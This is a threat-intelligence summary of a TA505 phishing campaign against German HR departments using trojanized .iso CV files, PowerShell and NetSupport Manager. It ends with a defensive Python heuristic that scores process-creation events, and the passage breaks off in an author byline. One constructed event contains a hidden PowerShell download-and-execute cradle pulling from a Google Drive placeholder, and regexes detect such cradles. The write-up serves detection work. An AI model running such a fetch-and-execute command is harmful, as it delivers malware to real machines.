TA505: A new attack, believed to be attributable to the threat group TA505, is targeting human resources departments within organizations located in Germany. Using Business Email Compromise (BEC)-style phishing emails, the group delivers trojanized disk image files (with the “.iso” file extension) disguised as curriculum vitae files. Once an .iso file is opened, an embedded Microsoft shortcut (.lnk) file runs a PowerShell script that deploys tools including the NetSupport Manager remote control administration tool for intelligence gathering and data theft. The group also uses Google Drive to host its attack tools and has previously used the GPG encryption tool as a ransomware capability. The research was released by Prevailion, and according to them the attacks have been ongoing since April 2018. TA505 has used PowerShell scripts to steal login credentials from browsers and to steal credit card information. In the first waves of the attack, the group used GPG to encrypt the victims’ files and hold them for ransom. In the second wave of attacks, the group used NetSupport Manager to steal information such as screen captures, voice recordings, and files. NetSupport was delivered via a Google Drive account operated by the attackers. Google Drive and other trusted cloud service providers have recently been used by multiple threat groups to host malware files in order to avoid detection by network-based defenses. Researchers attributed this attack to TA505 through a digital signature associated with the loader used in the German attacks.
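Because the payload is fetched from a trusted cloud host, network-side blocking gives little coverage; the chain described above (mounted .iso, .lnk double-clicked from Explorer, hidden PowerShell pulling from Google Drive) is better spotted on the endpoint. The following triage heuristic is an added example written for this summary, not code from Prevailion or Binary Defense; the process-creation events are constructed, loosely modelled on Sysmon Event ID 1 fields, and the Google Drive file id is a placeholder.

```python
import re

# Constructed process-creation events (parent image, image, command line, working dir).
SAMPLE_EVENTS = [
    # benign: user starts PowerShell from the Start menu
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    # suspicious: LNK inside a freshly mounted ISO (drive E:) spawns hidden PowerShell
    # that downloads the next stage from Google Drive (placeholder file id)
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://drive.google.com/uc?export=download&id=PLACEHOLDER_FILE_ID')\"",
     "cwd": "E:\\"},
    # admin script run from a cmd.exe session: one weak signal only
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ep bypass -File C:\scripts\inventory.ps1",
     "cwd": r"C:\scripts"},
]

# Only the Google Drive host is an indicator taken from the report; the rest is generic
# PowerShell tradecraft that the described chain happens to combine.
HIDDEN_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s+\S{20,}"
                          r"|ep\s+bypass|executionpolicy\s+bypass|noni)", re.I)
CLOUD_HOSTS = re.compile(r"https?://(drive|docs)\.google\.com/", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
DRIVE_ROOT = re.compile(r"^[A-Z]:\\?$")  # bare drive root, typical of a just-mounted ISO

def score_event(ev):
    """Return (score, reasons) for one event; each matched signal adds one point."""
    reasons = []
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    cmd = ev.get("cmdline", "")
    if ev.get("parent", "").lower().endswith("explorer.exe"):
        reasons.append("launched from Explorer (double-clicked shortcut is typical)")
    if DRIVE_ROOT.match(ev.get("cwd", "")):
        reasons.append("working directory is a bare drive root (mounted ISO)")
    if HIDDEN_FLAGS.search(cmd):
        reasons.append("hidden/bypass/encoded PowerShell flags")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if CLOUD_HOSTS.search(cmd):
        reasons.append("payload fetched from Google Drive")
    return len(reasons), reasons

def triage(events, threshold=3):
    """Return [(index, score, reasons)] for events scoring at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits
```

Run on the constructed events, only the ISO/LNK/Google Drive chain clears the threshold; the Start-menu launch and the scripted admin task each carry a single weak signal and are left alone.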
By Akshay Rohatgi and Randy Pargman

About this Student Research Project

Binary Defense’s mission is